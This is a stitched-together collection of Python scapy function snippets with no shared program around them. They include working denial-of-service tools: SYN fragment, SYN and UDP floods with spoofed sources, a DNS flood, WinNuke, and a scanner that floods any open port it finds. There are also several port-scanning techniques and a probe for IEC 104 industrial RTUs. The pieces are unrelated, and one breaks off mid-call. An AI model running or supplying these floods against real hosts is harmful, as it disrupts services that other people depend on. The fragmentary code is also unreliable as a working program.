def Syn_fragment(): clear = os.system('clear') print("**************************************") print(" SYN FragmentAttack") print("**************************************") print("Please input your target's IP") dst_ip = input("[SYN Fragment]#") src_ip = scapy.RandIP() #zidong sheng cheng yuan duankou he mudi duankou src_port = scapy.RandShort() dst_port = scapy.RandShort() packet_number = 0 try: while True: packet = scapy.IP(src=src_ip, dst=dst_ip, flags=[ 0x2000 ], frag=1) / scapy.TCP(dport=80, flags="S") / ("X" * 6000) #packet = scapy.IP(dst=dst_ip,flags=[0x2000],frag=1)/scapy.TCP(dport=80,flags="F")/("X"*6000) scapy.send(packet, verbose=False) packet_number += 1 print("[+]Sent packet is " + str(packet_number)) except KeyboardInterrupt: print("[-]Ctrl + C detected ....")
def GenerateSourcePort(source, port): if type(source) == "<class 'int'>": return int(source) if source == "MIRROR": return int(port) if source == "RAND": return int(scapy.RandShort())
def scanTCPPort(ip, port_dict, queue): while True: dst_port = queue.get() src_port = scapy.RandShort() packet = scapy.IP(dst=ip)/scapy.TCP(sport=src_port, dport=dst_port, flags="S") response = scapy.sr1(packet, verbose=False, timeout=5) if response is None: port_dict[dst_port]="Closed" elif(response.haslayer(scapy.TCP)): # If the packet returned had the SYN and ACK flags if(response.getlayer(scapy.TCP).flags == 0x12): # Send TCP packet back to host with ACK and RST flags packet = scapy.IP(dst=ip)/scapy.TCP(sport=src_port,dport=dst_port,flags=0x14) send_rst = scapy.sr(packet, verbose=False, timeout=5) port_dict[dst_port]="Open" # If the packet returned had the RST and ACK flags elif (response.getlayer(scapy.TCP).flags == 0x14): port_dict[dst_port]="Closed" else: port_dict[dst_port]="Closed" queue.task_done()
def escanearPuertos(host): print("\nEscaneando los puertos de la IP:", host) try: for puerto in listaPuertos: puertoOrigen = scapy.RandShort( ) #para que el paquete enviado tenga un puerto distinto cada vez paquete = scapy.IP(dst=host) / scapy.TCP( sport=puertoOrigen, dport=puerto, flags="S") respuesta = scapy.sr1(paquete, timeout=2) if ("NoneType" in str(type(respuesta))): pass elif (respuesta.haslayer(scapy.TCP) and respuesta.getlayer(scapy.TCP).flags == 0x12): p = scapy.IP(dst=host) / scapy.TCP( sport=puertoOrigen, dport=puerto, flags="R") rst = scapy.sr( p, timeout=1 ) #envío con flag RST activa para cortar la conexión try: servicio = scapy.socket.getservbyport( puerto) # obtiene info del puerto(si es conocido) except: servicio = "¿?" print("[ABIERTO]", puerto, " -> ", servicio) sendPackage( host, puerto, 2000 ) # si existe un puerto abierto, se envían paquetes para "denegar" el servicio except KeyboardInterrupt: print("Abortado por usuario")
def synPacket(tragetIp, tragetPort, networkIp): ip = scapy.IP(dst=networkIp, src=tragetIp) tcp = scapy.TCP(sport=scapy.RandShort(), dport=tragetPort, flags='S') raw = scapy.Raw(b"x" * 1024) packet = ip / tcp / raw scapy.send(packet, loop=0, verbose=0)
def sendPackage(ipDestino, puertoDestino, cantPack): IP_ORIGEN = "192.168.0.45" puertoOrigen = scapy.RandShort( ) #para que el paquete enviado tenga un puerto distinto cada vez print("\nComienza envio de paquetes a " + ipDestino) scapy.send(scapy.IP(src=IP_ORIGEN, dst=ipDestino) / scapy.TCP(sport=puertoOrigen, dport=puertoDestino), count=cantPack) print("Finaliza envio de paquetes a " + ipDestino)
def traceroute_dns_servers(hosts, fqdn): """ Run UDP traceroutes to the given DNS servers, using FQDN in DNS requests. """ log.info("Running UDP traceroutes to %d servers." % len(hosts)) addrs = [host.addr for host in hosts] udp_datagram = scapy.UDP(sport=scapy.RandShort()) dns_msg = scapy.DNS(qd=scapy.DNSQR(qname=fqdn)) return scapy.traceroute(addrs, l4=udp_datagram / dns_msg, verbose=0)
def Port_Scan(name): num = 0 #src_ip ="123.123.123."+str(name) try: while True: packet = scapy.IP(dst=target) / scapy.TCP(dport=scapy.RandShort(), flags="S") scapy.send(packet, count=1500, verbose=False) num += 1 print("Process:%s,Attack:%s" % (name, num)) except KeyboardInterrupt: print("Go back")
def UDP_Flood(name): num = i =1 try: while True: if (i > 0) is True: src_ip ="123.123.125."+str(i) packet = scapy.IP(src=src_ip,dst = target)/scapy.UDP(sport=scapy.RandShort()) scapy.send(packet,count=1500,verbose=False) num +=1 print("Process:%s,Attack:%s"%(name,num)) except KeyboardInterrupt: print("QUIT!")
def ack_scan(target, port): source_port = scapy.RandShort() ip_scan_packet = scapy.IP(dst=target) tcp_scan_packet = scapy.TCP(sport=source_port, dport=port, flags='A') scan_packet = ip_scan_packet / tcp_scan_packet scan_response = scapy.sr1(scan_packet, timeout=1, verbose=False) if scan_response != None: if scan_response.haslayer(scapy.TCP): if scan_response[scapy.TCP].flags == 4: return "Unfiltered" elif int(scan_response[scapy.ICMP].type) == 3 and int( scan_response[scapy.ICMP].code) in [1, 2, 3, 9, 10, 13]: return "Filtered" else: return "Filtered"
def scan_port(device_ip, port_to_scan): srcport = scapy.RandShort() SYNACK_packet = scapy.sr1(scapy.IP(dst=device_ip) / scapy.TCP(sport=srcport, dport=port_to_scan, flags="S"), timeout=.008) # packet with sync flag if SYNACK_packet is None: # if there are no response return False pkt_flags = SYNACK_packet.getlayer(scapy.TCP).flags # get flag if pkt_flags == SynAck: Rst_packet = scapy.IP(dst=device_ip) / scapy.TCP(sport=srcport, dport=port_to_scan, flags="R") # packet with reset flag scapy.send(Rst_packet) return True else: return False
def tcp_scan(self): src_port = s.RandShort() tcp_connect_scan_resp = s.sr1( s.IP(dst=self.host) / s.TCP(sport=src_port, dport=self.port, flags="S"), timeout=self.timeout) if (str(type(tcp_connect_scan_resp)) == "<type 'NoneType'>"): return False elif (tcp_connect_scan_resp.haslayer(s.TCP)): if (tcp_connect_scan_resp.getlayer(s.TCP).flags == 0x12): # send TCP RST s.sr(s.IP(dst=self.host) / s.TCP(sport=src_port, dport=self.port, flags="AR"), timeout=self.timeout) return True elif (tcp_connect_scan_resp.getlayer(s.TCP).flags == 0x14): return False
def SYN_Flood(name): num = 0 i = 1 try: while True: if (i > 0) is True: i += 1 src_ip = "123.123.123." + str(i) packet = scapy.IP(src=src_ip, dst=target) / scapy.TCP( sport=scapy.RandShort(), dport=80, flags="S") scapy.send(packet, count=1500, verbose=False) num += 1 print("Process:%s,Attack:%s" % (name, num)) except KeyboardInterrupt: print("Go back")
def window_scan(target, port): source_port = scapy.RandShort() ip_scan_packet = scapy.IP(dst=target) tcp_scan_packet = scapy.TCP(sport=source_port, dport=port, flags='A') scan_packet = ip_scan_packet / tcp_scan_packet scan_response = scapy.sr1(scan_packet, timeout=1, verbose=False) if scan_response != None: if scan_response.haslayer(scapy.TCP): if scan_response[scapy.TCP].flags == 4 and int( scan_response[scapy.TCP].window) > 0: return "Open" elif scan_response[scapy.TCP].flags == 4 and int( scan_response[scapy.TCP].window) == 0: return "Closed" else: return "Filtered"
def udp_scan(target, port): source_port = scapy.RandShort() ip_scan_packet = scapy.IP(dst=target) udp_scan_packet = scapy.UDP(sport=source_port, dport=port) scan_packet = ip_scan_packet / udp_scan_packet scan_response = scapy.sr1(scan_packet, timeout=1, verbose=False) if scan_response != None: if scan_response.haslayer(scapy.UDP): return "Open" elif int(scan_response[scapy.ICMP].type) == 3 and int( scan_response[scapy.ICMP].code) == 3: return "Closed" elif int(scan_response[scapy.ICMP].type) == 3 and int( scan_response[scapy.ICMP].code) in [1, 2, 9, 10, 13]: return "Filtered" else: return "Open|Filtered"
def tcp_scan(target_ip, target_port): try: src_port = scapy.RandShort() tcp_packet = scapy.TCP(sport=src_port, dport=target_port, flags="S") ip_packet = scapy.IP(dst=target_ip) packet_sent = ip_packet / tcp_packet response = scapy.sr1(packet_sent, timeout=0.5, verbose=False) flag = response.getlayer(scapy.TCP).flags if flag == synack: result = "port {} : open ".format(target_port) elif flag == rstack: result = False connection_close = scapy.IP(dst=target_ip) / scapy.TCP(sport=134, dport=target_port, flags="AR") scapy.send(connection_close, verbose=False) return result except AttributeError: return False except KeyboardInterrupt: print("[-] ctr+c ... Quiting") sys.exit(1)
def run(self, q): try: ans, unans = s.sr(s.IP(dst=str(self.host), ttl=(1, 30)) / s.TCP(sport=s.RandShort(), dport=80), retry=2, timeout=5) self.success = True rtr_index = 0 for snd, rcv in ans: if self.routers[rtr_index] == rcv.fields['src']: # found the next router in our list rtr_index += 1 if len(self.routers) == rtr_index: # ran out of routers to look for, all done! break else: # found some router that didn't match self.success = False break except: self.success = False return q.put(self.create_result())
def DNS_Flood(): clear = os.system('clear') #s = scapy.RandString(scapy.RandNum(1,10)) #s1 ='www' #print(s1) #a = scapy.RandNum(1,10) #print(a) #s2 = scapy.RandString(scapy.RandNum(1,5)) #s2 = s2.lower() #s2 = str(s2) #s2 = s2[2:-1] #print(s2) #process_id =process_id #s3 = 'com' #s = s1+'.'+s2+'.'+s3 #print("Please input target's IP:") #target = input("[DNS_Flood]#") #target = "172.16.4.80" #src_ip = scapy.RandIP() #print(s) num = 0 try: while True: packet = scapy.IP(dst="172.16.4.80") / scapy.UDP( sport=scapy.RandShort(), dport=53) / scapy.DNS( rd=1, qd=scapy.DNSQR(qname="www.flood.com")) #packets = scapy.IP(src=src_ip,dst=target)/scapy.UDP(sport=scapy.RandShort(),dport=53)/scapy.DNS(rd=1,qd=scapy.DNSQR(qname="www.flood.com")) #packet =scapy.IP(src=src_ip,dst=target)/scapy.TCP(dport=80,flags="S") #scapy.srflood(packet) scapy.send(packet, count=2000, verbose=False) #scapy.send(packets,verbose=False) num += 1 #if num == 1000: #print("%s,%s"%(name,num)) print(num) except KeyboardInterrupt: print("[-] Ctrl + C detected.....")
def run(self, rps, profile): while True: # print_w_pid('Filling buffer ...') # print_w_pid('Selected profile: %s' % profile) while rps != len(self.buffer): # Define IP headers ip_h = scapy.IP() ip_h.dst = self.dst if profile == 'SYN_flood': ip_h.src = next(self.ip_generator) # Define TCP headers tcp_h = scapy.TCP() tcp_h.sport = scapy.RandShort() tcp_h.dport = self.dport tcp_h.flags = 'S' # Assemble the network package pkt = ip_h / tcp_h self.buffer.append(pkt) self.sent_counter, self.time_last_insertion, self.avg_rps_counter = \ self._send_batch(self.buffer, self.sent_counter, self.time_last_insertion, self.avg_rps_counter) self.buffer[:] = []
def syn_scan(target, port): source_port = scapy.RandShort() ip_scan_packet = scapy.IP(dst=target) tcp_scan_packet = scapy.TCP(sport=source_port, dport=port, flags='S') scan_packet = ip_scan_packet / tcp_scan_packet scan_response = scapy.sr1(scan_packet, timeout=1, verbose=False) if scan_response != None: if scan_response.haslayer(scapy.TCP): if scan_response[scapy.TCP].flags == 18: ip_reset_packet = scapy.IP(dst=target) tcp_reset_packet = scapy.TCP(sport=source_port, dport=port, flags='R') reset_packet = ip_reset_packet / tcp_reset_packet reset_response = scapy.send(reset_packet, verbose=False) return "Open" elif scan_response[scapy.TCP].flags == 20: return "Closed" else: return "Filtered"
def open(self): self.sock = scapy.L3RawSocket() try: # syn tcp = scapy.TCP( dport=self.dport, sport=scapy.RandShort(), flags='S', ) p = self.sock.sr1( scapy.IP(dst=self.dst) / tcp, verbose=self.verbose, ) self.sport = p[scapy.TCP].dport self.wseq = p[scapy.TCP].ack self.rseq = p[scapy.TCP].seq # ack tcp = scapy.TCP( dport=self.dport, sport=self.sport, seq=self.wseq, ack=self.rseq + 1, flags='A', ) self.sock.send(scapy.IP(dst=self.dst) / tcp) except: self.sock.close() self.sock = None raise @contextlib.contextmanager def _close(): try: yield finally: self.close() return _close()
def WinNuke(): clear = os.system('clear') print("**************************************") print(" WinNuke Attack") print("**************************************") print("Please input your target's IP") target = input("[WinNuke Attack]#") num = 0 try: while True: packetss = scapy.IP(src=scapy.RandIP(), dst=target) / scapy.TCP( sport=scapy.RandShort(), dport=[139, 138, 137], flags=0x020, seq=1, window=512) scapy.send(packetss, verbose=False) num += 1 print("Sent " + str(num) + "packets") except KeyboardInterrupt: print("[-] Ctrl + C detected.......")
def xnf_scan(target_ip, target_port, flags): # (xmas , fin , null ) # does'nt work for windows os try: result = "" src_port = scapy.RandShort() tcp_packet = scapy.TCP(sport=src_port, dport=target_port, flags=flags) ip_packet = scapy.IP(dst=target_ip) packet_sent = ip_packet / tcp_packet response = scapy.sr1(packet_sent, timeout=0.5, verbose=False) flag = response.getlayer(scapy.TCP).flags if flag == rstack: result = False elif response.getlayer(scapy.ICMP): if int(response.getlayer(scapy.ICMP).type) == 3 and int(response.getlayer(scapy.ICMP).code) in [1, 2, 3, 9, 10, 13]: result = "port {} : Filtered ".format(target_port) return result except AttributeError: return "port {} : OPEN | Filtered".format(target_port) except KeyboardInterrupt: print("[-] ctr+c ... Quiting") sys.exit(1)
threads = [] for hosts in [nethosts[i:i + 16] for i in range(0, len(nethosts), 16)]: t = Thread(target=arpscan, kwargs={'hosts': hosts}) t.start() threads.append(t) while len(threads): for t in threads: t.join(1) if not t.is_alive(): threads.pop(threads.index(t)) print('[+] Scanning for RTUs ...') rtus = [] for host in alive: if host != address['addr']: sport = scapy.RandShort() print('[-] Trying {0:s} ...\r'.format(host), end='') response = scapy.sr1( scapy.IP(src=address['addr'], dst=host) / scapy.TCP(sport=sport, dport=IEC104_PORT, flags='S'), iface=iface, timeout=0.1, retry=0, verbose=0) if response is None: # Filtered pass elif response.haslayer('TCP'): if response['TCP'].flags == 0x12: # Open port -- Probably an RTU reset = scapy.sr(
import sys import scapy.all as scapy target = '8.8.8.8' if len(sys.argv) == 2: target = sys.argv[1] ans, unans = scapy.sr(scapy.IP(dst=target, ttl=(1, 22), id=scapy.RandShort()) / scapy.TCP(flags=0x2), timeout=10) for snd, rcv in ans: print(snd.ttl, rcv.src, isinstance(rcv.payload, scapy.TCP))